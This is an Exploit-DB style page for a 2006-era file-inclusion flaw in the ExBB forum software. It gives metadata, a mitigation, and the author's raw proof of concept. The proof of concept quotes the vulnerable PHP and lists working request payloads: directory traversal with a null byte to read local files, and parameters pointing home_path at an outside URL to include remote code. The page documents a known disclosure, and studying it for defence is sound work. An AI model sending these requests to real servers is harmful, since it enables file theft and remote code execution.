header-logo
Suggest Exploit
vendor:
ExBB
by:
The:Paradox
6.4
CVSS
CRITICAL
Multiple File Inclusion / Code Execution
94
CWE
Product Name: ExBB
Affected Version From: 0.22
Affected Version To: 0.22
Patch Exists: NO
Related CWE: CVE-2006-4456
CPE: a:exbb:exbb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

ExBB <= 0.22 Multiple File Inclusion / Code Execution Vulnerability

ExBB <= 0.22 is vulnerable to multiple file inclusion and code execution due to improper input validation. The vulnerability is caused due to the use of register_globals, allow_url_fopen, and allow_url_include PHP directives. An attacker can exploit this vulnerability by sending malicious requests to the vulnerable server.

Mitigation:

Disable register_globals, allow_url_fopen, and allow_url_include PHP directives.
Source

Exploit-DB raw data:

#====================================================================================================#
#                     ____            __________         __             ____  __                     #
#                    /_   | ____     |__\_____  \  _____/  |_          /_   |/  |_                   #
#                     |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\                  #
#                     |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |                    #
#                     |___|___|  /\__|  /______  /\___  >__|            |___||__|                    #
#                              \/\______|      \/     \/                                             #
#====================================================================================================#
#                                     This is a public Exploit                                       #
#====================================================================================================#
#  	           		            ExBB <= 0.22                                             #
#                         Multiple File Inclusion / Code Execution Vulnerability                     #
#	     	               								             #
#====================================#===============#====================================#==========#
# Server Configuration Requirements  #               # Some Information                   #          #
#====================================#		     #====================================#          #
#                                                    #                                               #
# [RFI]                       [LFI]                  #  Vendor:   exbb.clans.it                      #
#                                                    #  Author:   The:Paradox                        #
# register_globals   = 1      register_globals = 1   #  Severity: Moderately Critical                #
# allow_url_fopen    = 1      magic_quotes_gpc = 0   #                                               #
# allow_url_finculde = 1 			     #  Proud To Be Italian.                         #
#                                                    #                                               #
#====================================#===============#===============================================#
# Proof Of Concept / Bug Explanation #                                                               #
#====================================#                                                               #
# Exbb presents File Inclusion Vulnerabilities. Let's have a look of the source.                     #
#                                                                                                    #
#  /modules/threadstop/threadstop.php                                                                #
#                                                                                                    #
#  1. <?php                                                                                          #
#  2. ################# PATCH by Flippo ######################                                       #
#  3. if ((stristr($_SERVER['QUERY_STRING'], 'exbb[home_path]'))                                     #
#  4. or (stristr($_SERVER['QUERY_STRING'], "exbb['home_path']"))) {                                 #
#  5. die();                                                                                         #
#  6. }                                                                                              #
#  7. ########################################################                                       #
#  8.                                                                                                #
#  9. include($new_exbb[home_path].'modules/threadstop/data/threadstop_data.php');                   #
# 10. include($exbb[home_path].'modules/threadstop/language/'.$exbb[default_lang].'/lang.php');      #
#                                                                                                    #
# The patch of Filippo, is a completely useless code.                                                #
# When Register_Globals is On we can set $new_exbb[home_path] not only via GET variables, but        #
# also via POST and COOKIE.                                                                          #
# Moreover Filippo has forgot to fix $exbb[default_lang] too.                                        #
#                                                                                                    #
# Example:                                                                                           #
#                                                                                                    #
# [LFI]                                                                                              #
#                                                                                                    #
# GET  site.it/Ex/modules/threadstop/threadstop.php?exbb[default_lang]=../../../../../../[File]%00   #
# GET  site.it/Ex/modules/threadstop/threadstop.php?exbb[default_lang]=../../../../../install.php%00 #
#                                                                                                    #
# [RFI]                                                                                              #
#                                                                                                    #
# POST site.it/Ex/modules/threadstop/threadstop.php?  new_exbb[home_path]=http://www.google.it?      #
# POST site.it/Ex/modules/threadstop/threadstop.php?  exbb[home_path]=http://www.yoursite.com/page?  #
#                                                                                                    #
#====================================================================================================#
# Use this at your own risk. You are responsible for your own deeds.                                 #
#====================================================================================================#

# milw0rm.com [2008-04-08]

Navigation

Suggest Exploit

Services By CQR